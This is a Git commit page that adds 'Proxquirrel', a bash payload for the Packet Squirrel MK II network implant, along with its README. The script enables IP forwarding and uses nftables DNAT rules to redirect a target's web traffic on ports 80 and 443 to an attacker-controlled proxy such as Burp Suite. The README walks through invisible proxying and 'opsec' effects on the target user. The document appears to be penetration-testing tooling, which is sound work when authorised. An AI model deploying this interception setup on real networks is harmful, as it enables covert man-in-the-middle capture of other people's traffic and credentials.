Peaks
GitHub
commit
31eca5b110
|
|
@ -0,0 +1,59 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Title: Proxquirrel
|
||||
# Author: 0i41E
|
||||
#
|
||||
# Description: A payload to route web traffic to a defined Proxy, like BurpSuite.
|
||||
#
|
||||
# Usage: Setup a HTTP proxy like Burp, accessible for the Squirrel and define it under line 17 & 18
|
||||
|
||||
# Set Network mode
|
||||
NETMODE NAT
|
||||
SSH_STOP
|
||||
UI_STOP
|
||||
|
||||
LED STAGE3
|
||||
sleep 2
|
||||
|
||||
# Define HTTP proxy below
|
||||
PROXY_ADDRESS="0.0.0.0" # Proxy Address
|
||||
PROXY_PORT="8080" # Proxy Port
|
||||
# Optional to change
|
||||
TARGET_PORTS="80, 443" # Intercepted Web Ports
|
||||
RULE_NAME="Proxquirrel"
|
||||
RETRY=5 # Seconds between connection attempts
|
||||
|
||||
# Enable IPv4 forwarding
|
||||
echo 1 > /proc/sys/net/ipv4/ip_forward
|
||||
|
||||
# Loop until the proxy is reachable
|
||||
while true; do
|
||||
if nc -z -w5 "$PROXY_ADDRESS" "$PROXY_PORT"; then
|
||||
LED Y SOLID
|
||||
sleep 2
|
||||
|
||||
# Create a nft ruleset to redirect traffic from ports defined in TARGET_PORTS
|
||||
nft add table ip $RULE_NAME
|
||||
nft -- add chain ip $RULE_NAME prerouting { type nat hook prerouting priority -100 \; }
|
||||
nft add rule ip $RULE_NAME prerouting tcp dport { $TARGET_PORTS } dnat to $PROXY_ADDRESS:$PROXY_PORT
|
||||
|
||||
LED FINISH
|
||||
sleep 3
|
||||
|
||||
# Cleanup, when BUTTON is pressed
|
||||
NO_LED=1 BUTTON
|
||||
|
||||
LED CLEANUP
|
||||
sleep 3
|
||||
|
||||
# Delete the table when BUTTON is pressed, to revert changes
|
||||
nft delete table ip $RULE_NAME
|
||||
|
||||
LED B SOLID
|
||||
break
|
||||
else
|
||||
# Retry in X seconds
|
||||
LED FAIL2
|
||||
sleep $RETRY
|
||||
fi
|
||||
done
|
||||
|
|
@ -0,0 +1,43 @@
|
|||
# Proxquirrel
|
||||
#### Author:
|
||||
|
||||
**Proxquirrel** is a payload designed for the [Packet Squirrel MK II](https://shop.hak5.org/products/packet-squirrel-mark-ii) in combination with a HTTP proxy, like [BurpSuite](https://portswigger.net/burp/releases/professional-community-2024-5-5?requestededition=community&requestedplatform=).
|
||||
|
||||
This payload will redirect common web ports like 80 and 443 and therefore enables the user to intercept such traffic with an external proxy and tinker with its content.
|
||||
|
||||
## Preperation
|
||||
#### Squirrel
|
||||
Before deploying the Squirrel as also the payload, the user has to configure the payload.
|
||||
Set `PROXY_ADDRESS` and `PROXY_PORT`. This has to be the proxy (server).
|
||||
The other options are optional and can be changed, if needed.
|
||||
#### BurpSuite
|
||||
Start up BurpSuite and navigate to the *Proxy* tab and open up the *Proxy Settings*.
|
||||
Here you have to edit the *proxy listener*.
|
||||
|
||||
|
||||
|
||||
Set the *bind address* to either an interface accessible by the Squirrel or simply select *All Interfaces*.
|
||||
|
||||
|
||||
|
||||
*The payload will automatically verify the connection. If the proxy can't be reached, the payload will fall into a loop, until the proxy (server) is accessible.*
|
||||
|
||||
For the last step, we have to check *Support invisible proxying* under the *Request handling* tab.
|
||||
|
||||
|
||||
|
||||
In this mode, BurpSuite intercepts traffic that is not specifically directed at a proxy. It acts as an intermediary without requiring the client to be configured for a proxy. This is useful for intercepting traffic from devices or applications that do not allow for proxy configuration. (Or in this case, do not know about it)
|
||||
|
||||
Traffic to ports 80 & 443 should now be redirected to your proxy.
|
||||
|
||||
#### Cleanup
|
||||
To revert the changes on the Squirrel, press the button to perform a cleanup.
|
||||
|
||||
|
||||
|
||||
### Opsec Considerations
|
||||
Since this payload performs some sort of interception of the targets traffic, the target-user may encounter multiple issues:
|
||||
- Security warnings about the connection to a web page not being secure.
|
||||
- Not being able to use certain web applications due to HSTS.
|
||||
- Sensitive information may be visible within the intercepted requests and should be handled with care.
|
||||
- The user may be blocked by certain WAF's
|
||||
Loading…
Reference in New Issue